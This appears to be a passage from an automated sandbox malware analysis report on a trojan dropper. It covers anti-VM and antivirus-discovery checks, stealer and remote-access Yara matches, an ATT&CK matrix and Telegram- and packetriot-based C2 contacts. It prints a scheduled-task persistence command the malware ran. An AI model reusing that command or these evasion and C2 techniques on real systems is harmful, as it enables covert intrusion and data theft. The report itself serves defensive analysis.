                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Amcache.hve.18.drBinary or memory string: VMware
                      Source: Amcache.hve.18.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.18.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.18.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.18.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.18.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.18.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: svchost.exe, 00000013.00000002.3876943198.000002A0E1ED6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.18.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.18.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.18.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.18.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.18.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.18.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.18.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: svchost.exe, 00000013.00000003.2813846209.000002A0E2E55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                      Source: Amcache.hve.18.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.18.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.18.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: X.exe, 00000002.00000002.2842784193.000000001BB3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
                      Source: Amcache.hve.18.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                      Source: Amcache.hve.18.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.18.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: X.exe, 00000002.00000002.2838234849.0000000000ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_@
                      Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.18.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.18.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.18.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.18.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.18.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess created: C:\Users\user\AppData\Roaming\X.exe "C:\Users\user\AppData\Roaming\X.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess created: C:\Users\user\AppData\Roaming\61c7cdb3196df.exe "C:\Users\user\AppData\Roaming\61c7cdb3196df.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 3280 -ip 3280Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3280 -s 1732Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeQueries volume information: C:\Users\user\AppData\Roaming\X.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.18.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.18.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.18.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.18.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: X.exe, 00000002.00000002.2842784193.000000001BAC0000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000002.00000002.2838234849.0000000000ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Amcache.hve.18.drBinary or memory string: MsMpEng.exe
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 2.0.X.exe.960000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe PID: 1072, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: X.exe PID: 3280, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\X.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 2.0.X.exe.960000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe PID: 1072, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: X.exe PID: 3280, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\X.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Windows Management Instrumentation
                      1
                      Scheduled Task/Job
                      11
                      Process Injection
                      11
                      Masquerading
                      OS Credential Dumping1
                      Query Registry
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      21
                      Registry Run Keys / Startup Folder
                      1
                      Scheduled Task/Job
                      1
                      Disable or Modify Tools
                      LSASS Memory231
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      DLL Side-Loading
                      21
                      Registry Run Keys / Startup Folder
                      141
                      Virtualization/Sandbox Evasion
                      Security Account Manager1
                      Process Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      DLL Side-Loading
                      11
                      Process Injection
                      NTDS141
                      Virtualization/Sandbox Evasion
                      Distributed Component Object ModelInput Capture1
                      Ingress Tool Transfer
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      Application Window Discovery
                      SSHKeylogging2
                      Non-Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      File and Directory Discovery
                      VNCGUI Input Capture13
                      Application Layer Protocol
                      Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                      Software Packing
                      DCSync23
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1387375 Sample: SecuriteInfo.com.Trojan.Mul... Startdate: 06/02/2024 Architecture: WINDOWS Score: 100 41 api.telegram.org 2->41 43 trusting-smoke-90361.pktriot.net 2->43 45 eu-central-7075.packetriot.net 2->45 55 Multi AV Scanner detection for domain / URL 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 63 14 other signatures 2->63 9 SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe 4 2->9         started        12 svchost.exe 8 2->12         started        14 svchost.exe 2 1 2->14         started        signatures3 61 Uses the Telegram API (likely for C&C communication) 41->61 process4 file5 33 C:\Users\user\AppData\Roaming\X.exe, PE32 9->33 dropped 35 C:\Users\user\AppData\...\61c7cdb3196df.exe, PE32 9->35 dropped 16 X.exe 15 5 9->16         started        21 61c7cdb3196df.exe 9->21         started        23 WerFault.exe 2 12->23         started        process6 dnsIp7 37 api.telegram.org 149.154.167.220, 443, 49705, 49784 TELEGRAMRU United Kingdom 16->37 39 eu-central-7075.packetriot.net 167.71.56.116, 22100, 49706, 49707 DIGITALOCEAN-ASNUS United States 16->39 31 